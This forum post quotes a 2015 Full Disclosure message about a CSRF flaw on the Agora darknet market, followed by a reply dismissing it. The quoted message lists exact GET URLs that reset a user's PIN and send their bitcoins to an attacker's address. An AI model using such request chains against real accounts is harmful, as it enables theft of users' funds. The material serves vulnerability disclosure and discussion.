Agora CRSF Flaw, fairly major. Has it been patched? http://seclists.org/fulldisclosure/2015/Feb/64
I haven't seen a thing about this on the DNM subreddit so here is the breakdown, if anyone can chime in with a "yea this is fixed" that would be awesome.
"Agora Marketplace CSRF to Steal Bitcoins (agorahooawayyfoe.onion) From: agoraagoraagora () hushmail com Date: Wed, 18 Feb 2015 06:11:36 +0000
Ladies and gentlemen Boys and girls It come to our attention that a brave warrior for the people Ross William Ulbricht was unlawfully convicted by the corporation known as the American government.
This mockery of justice has not gone unnoticed.
In order to protect the next generation of darknet markets we will be disclosing vulnerabilities for these sites in order to make these sites safer from attack.
To start, the Agora Marketplace contains a CSRF vulnerability which can be used to drain a victim account of all of their Bitcoins. The following URLs can be used to perform this attack:
URL to start PIN reset: http://agorahooawayyfoe.onion/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit=
URL to change current PIN: http://agorahooawayyfoe.onion/resetpin?pin1=1337&pin2=1337&submit=Save
URL to send bitcoins using the new pin: http://agorahooawayyfoe.onion/sendbitcoins?targetaddress=[YOUR_BTC_ADDY]&withdrawschedule=0&targetamount=1&walletpin=1337&submit=Send
These are all GET requests and don't require JavaScript to work. NoScript cannot save you from poor coding practices.
There will be more to come. Stay safe. Stay anonymous.
-The Guardians of Peace "
This is bollocks.
Agora is now a bitcoinless marketplace. All the wallet trouble was the changeover.
Bitcoin gets left at the door, and tumbled while you are handed casino chips to spend in the marketplace.
When the vendor withdraws funds, the casino chips are replaced with bitcoin sent from the tumbler outside the door. Inside, the escrows, commission, postage, finalizing, refunds - are all just maths. Nothing occurs on the blockchain. Its a fly-by-wire marketplace without bitcoin or wallets. 4% less is sent to vendors than is deposited by buyers - their comission.
remember how deposits werent being credited to you on the market? but all the internal trading continued to work wen the tumbler and wallets werent working? The big roundabout tumbler wheel outside the casino wasn't attached. It was just freewheeling
Agora will get this kind of ill-thought blackmail or scam attempt every day of the week. nobody can "hack" their "escrow wallet". there isn't one